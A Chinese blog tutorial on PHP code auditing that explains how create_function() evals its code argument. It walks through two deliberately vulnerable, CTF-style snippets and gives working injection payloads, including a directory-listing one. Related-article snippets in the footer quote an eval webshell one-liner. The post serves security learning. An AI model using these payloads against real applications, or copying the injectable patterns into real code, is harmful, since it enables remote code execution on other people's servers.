[php代码审计]之create_function()函数

最新推荐文章于 2024-02-22 17:41:57 发布
最新推荐文章于 2024-02-22 17:41:57 发布
阅读量1.7k 收藏 8
点赞数 1
分类专栏: # php代码审计 文章标签: php 正则表达式 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51652864/article/details/115701537
版权

[php代码审计]之create_function()函数
这篇文章结合了许多师傅的博客,再加上了一点我自己的心得

文章目录

creat_function()介绍

适用范围:php4>=4.0.1,php5,php7
功能:
根据传递的参数创建匿名函数,并为其返回唯一名称
语法:

creat_function(string $agrs,string $code)
//string $agrs	声明的函数变量部分
//string $code	执行的方法代码部分

使用

官方手册使用

代码

<?php
$newfunc = create_function('$a,$b', 'return "ln($a) + ln($b) = " . log($a * $b);');
echo "New anonymous function: $newfunc\n";
echo $newfunc(2, M_E) . "\n";
// outputs
// New anonymous function: lambda_1
// ln(2) + ln(2.718281828459) = 1.6931471805599
?>

可以得到
在这里插入图片描述
代码分析:

create_frunction()函数会创建一个匿名函数(为lambda样式),并会在内部执行eval()函数,在这里也就是执行后面的return语句,而这个位置正好是属于(string
$code)的

所以实际上create_function()函数可以等价于:

<?php
function lambda_1($a,$b){
	return "ln($a) + ln($b) = " . log($a * $b);
}
;?>

实现了匿名函数的效果

实际例子

0x01
<?php
error_reporting(0);
$sort_by = $_GET['sort_by'];
$sorter = 'strnatcasecmp';
$databases=array('1234','4321');
$sort_function = ' return 1 * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]);';
usort($databases, create_function('$a, $b', $sort_function));
?>

payload的构造:

url?sort_by='"]);}phpinfo();/*

在这里插入图片描述
成功执行了phpinfo()
其实也就是相当于执行了:

function niming($a,$b){
return 1 * ' . $sorter . '($a["' . $sort_by '"]);
}
phpinfo();/*
}

这里的/*就是把后面的代码全部注释掉

0x02

代码:

 <?php
error_reporting(0);
if(isset($_GET['action'])) {
    $action = $_GET['action'];
}

if(isset($_GET['action'])){
    $arg = $_GET['arg'];
}

if(preg_match('/^[a-z0-9_]*$/isD', $action)){
    show_source(__FILE__);
} else {
    $action($arg,'');
}
代码分析

这道题需要传入两个变量,变量名分别为actionarg,并且对action变量做了正则过滤,不能以数字,字母,下划线开头,

最后的/i是不区分大小写,/s匹配任何不可见字符 /D如果以$限制结尾字符,则不允许结尾有换行

要绕过这个正则表达式的话,要用一个全局空间

(在名称前面加上\即代表是全局空间,大家可以自行了解全局空间)

这里附上官方说明全局空间
因此,可以构造出payload:

action=\create_function&arg=){}phpinfo();/*

得到:
在这里插入图片描述
如果是要做题的话还可以继续构造:

action=\create_function&arg=){}print_r(scandir(dirname(__file__)));/*

可以直接列出目录表,最后读取某某文件即可

参考博客

博客1
博客2

o3Ev
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
一道有意思的代码审计create_function
Panacea
04-27 636
<?php show_source(__FILE__); $key = "bad"; extract($_POST); if($key === 'bad'){ die('badbad!!!'); } $act = @$_GET['act']; $arg = @$_GET['arg']; if(preg_match('/^[a-z0-9_]*$/isD',$act)) { ec...
PHP代码审计之常见的危险函数及特殊函数
qq_48008847的博客
07-19 517
PHP代码执行函数: eval&assert&preg_replace eval函数将字符串作为php代码执行,如:<?php @eval($_POST['v']);?> 很多常见的webshell都是用eval来执行的
MySQL 自定义函数CREATE FUNCTION示例
12-15
mysql> mysql> delimiter $$ mysql> mysql> CREATE FUNCTION myFunction -> (in_string VARCHAR(255), -> in_find_str VARCHAR(20), -> in_repl_str VARCHAR(20)) -> -> RETURNS VARCHAR(255) -> BEGIN -> DECLARE l_new_string VARCHAR(255); -> DECLARE l_find_pos INT; -> -> SET l_find_pos=INSTR(in_string,in_find_st
PHP代码 之create_function()函数
snowlyzz的博客
10-05 4346
create_function 详解
create_function()函数利用
weixin_61785633的博客
06-11 938
最近做题发现有利用到这个函数,所以就找了这篇学习了一下,并做个笔记适用范围 : php < 7.2 7.2也有不过会有报错。
[代码审计]PHP代码审计create_function()函数
Y4tacker的博客
08-02 7901
前言:引用了各路大佬参考资料,整合成自己能够看懂并接受的笔记,欢迎指正 学习一点小知识: // 这是 PHP 单行注释 /*这是 PHP 多行注释*/ /*直接注释掉后面所有代码` 文章目录create_function()简介基本使用代码片段运行截图分析代码注入案例案例一案例二参考资料--欢迎考证 create_function()简介 适用范围:PHP 4> = 4.0.1,PHP 5,PHP 7 功能:根据传递的参数创建匿名函数,并为其返回唯一名称。 语法: create_function(st
create_function() 代码注入,,PHP7.2竟然还存在
烟敛寒林的博客
05-09 1万+
第一部分:php函数 create_function() 介绍 理论: create_function()主要用来创建匿名函数,有时候匿名函数可以发挥它的作用。 stringcreate_function (string$args ,string$code ) string$args变量部分 string$code 方法代码部分 举例: create...
php审计之——常见危险函数
qq_44632427的博客
07-29 795
一、php代码执行函数 1、eval:把字符串$code作为代码来执行。很多常见的webshell都是用eval来执行具体操作的。 例如一句话: <?php @eval($_POST['xxx']);?> 2、assert:调试函数,检查第一个断言是否为FALSE。(把字符串$assertion作为php代码执行) 因为大多数杀软把eval列入黑名单了,所以用assert来代替eva...
PHP代码审计之基础篇
热门推荐
Mi1k7ea
04-18 1万+
最近在学PHP代码审计,那就将学习的笔记都整理一遍吧~ 前期准备: 1、安装相关软件,如Sublime text、 Notepad++、editplus、 Seay源代码审计系统等 2、获得源码,可以到网上下载各种网站源码 3、安装网站 审计方法: 通读全文法:麻烦但全面 敏感函数参数回溯法:高效常用,Seay源代码审计系统 定向功能分析法:主要根据程序的业
【基础篇】第09篇:PHP代码审计笔记--代码执行漏洞1
08-03
### PHP代码审计笔记——代码执行漏洞详解 #### 一、漏洞背景及成因 在Web应用开发中,尤其是在使用PHP语言构建的应用中,代码执行漏洞是一种常见的安全问题。这类漏洞通常发生在开发人员未能正确处理来自不可信源...
PHPcreate_function的用法总结
azzfanke的专栏
12-22 7793
php中,函数create_function主要用来创建匿名函数,有时候匿名函数可以发挥它的作用。 1.测试一 测试一主要用来循环替换数组中多个值的,我们用array_map加上create_function解决这个问题。 ############################################### function filterChars($a) {
create_function 函数
weixin_33873846的博客
12-23 256
为什么80%的码农都做不了架构师?>>> ...
create function php,PHP create_function 用法 手册 | 示例代码
weixin_36472962的博客
03-09 212
In the process of migrating a PHP4 codebase to PHP5, I ran into a peculiar problem. In the library, every class was derived from a generic class called 'class_container'. 'class_container' contained a...
php代码审计函数,PHP代码审计create_function()函数
weixin_42423817的博客
03-28 255
0x00 create_function()简介适用范围:PHP 4> = 4.0.1,PHP 5,PHP 7功能:根据传递的参数创建匿名函数,并为其返回唯一名称。语法:1 create_function(string $args,string $code)2 string $args声明的函数变量部分34 string $code 执行的方法代码部分0x01 函数功能分析案例:保存为cre...
php create_function 需要开启什么模块,PHP create_function()代码注入
weixin_34882814的博客
03-16 154
第一部分:介绍php函数 create_function():string create_function( string $args, string $code)string $args变量部分string $code 方法代码部分举例:create_function("$fname","echo$fname."Zhang"")类似于:functionfT($fname){echo$fn...
mysql 自定义函数create function
最新发布
简单-生活
02-22 2044
自定义函数是一种与存储过程十分相似的过程式数据库对象, 它与存储过程一样,都是由 SQL 语句和过程式语句组成的代码片段,并且可以被应用程序和其他 SQL 语句调用。 自定义函数与存储过程之间存在几点区别:创建并使用自定义函数 使用 CREATE FUNCTION 语句创建自定义函数。 语法格式如下: 存储函数返回table类型,使用mysql v5.7和v8.0都没有验证成功; 一直报以下错误,后续如有进展更新些处; 参考文档:https://blog.51cto.com/u
PHP - 代码执行 - create_function()
3569
11-29 1740
https://paper.seebug.org/94/ create_function() 大致流程如下 1. 获取参数, 函数体; 2. 拼凑一个”function __lambda_func (参数) { 函数体;} “的字符串; 3. eval; 4. 通过__lambda_func在函数表中找到eval后得到的函数体, 找不到就出错; 5. 定义一个函数名:”\000_la...
命令执行漏洞php函数,PHP create_function注入命令执行漏洞
weixin_35755562的博客
03-16 481
PHP中使用create_function()创建匿名函数,如果没有严格对参数传递进行过滤,攻击者可以构造特殊字符串传递给create_function()执行任意命令。以如下代码为例://how to exp this code$sort_by=$_GET['sort_by'];$sorter='strnatcasecmp';$databases=array('test','test');$s...
匿名函数create_function()代码注入
soldi_er的博客
04-29 1120
文章目录查看PHP函数源码-暂无概述1.本地搜索-无2.PHP官网-无目标版本3.Github-无意外收获1.匿名函数create_function(arg,code)影响和利用场景查看和分析参考 查看PHP函数源码-暂无 概述   有时候需要查看PHP内置函数的源代码,目标源代码版本是PHP/5.0-7.0版本。值得一提的是,PHP语言是用C编写的。 1.本地搜索-无   PHP源码存储在ext目录下,打开ext目录,发现全是.dll应用程序扩展文件。 设置文件搜索选项,点击左上角的查看,然后点击右上
device_create_file函数和sysfs_create_file函数的区别
06-13
`device_create_file` 和 `sysfs_create_file` 函数都可以用于在 sysfs 文件系统中创建文件,但它们的使用场景略有不同。 `sysfs_create_file` 函数是一个通用的函数,它可以在 sysfs 文件系统的任意位置创建文件。该函数的原型如下: ```c int sysfs_create_file(struct kobject *kobj, const struct attribute *attr); ``` 其中,`kobj` 参数是指向 `struct kobject` 结构体的指针,该结构体表示要在其下面创建文件的 sysfs 对象。`attr` 参数是指向 `struct attribute` 结构体的指针,该结构体描述了要创建的文件的属性。`sysfs_create_file` 函数会在 sysfs 文件系统中创建一个与 `attr` 中描述的属性相关联的文件,并将其与 `kobj` 参数指向的 sysfs 对象关联起来。 相比之下,`device_create_file` 函数更加专业化。它是针对 Linux 设备驱动程序的一种特殊机制,用于在与设备相关联的 sysfs 对象下创建文件。该函数的原型如下: ```c int device_create_file(struct device *dev, const struct attribute *attr); ``` 其中,`dev` 参数是指向 `struct device` 结构体的指针,该结构体表示与设备相关联的设备对象。`attr` 参数是指向 `struct attribute` 结构体的指针,该结构体描述了要创建的文件的属性。`device_create_file` 函数会在 sysfs 文件系统中创建一个与 `attr` 中描述的属性相关联的文件,并将其与 `dev` 参数指向的设备对象关联起来。 因此,如果你需要在 sysfs 文件系统的任意位置创建文件,可以使用 `sysfs_create_file` 函数。而如果你需要在 Linux 设备驱动程序中为设备创建文件,应该使用 `device_create_file` 函数
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

o3Ev

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值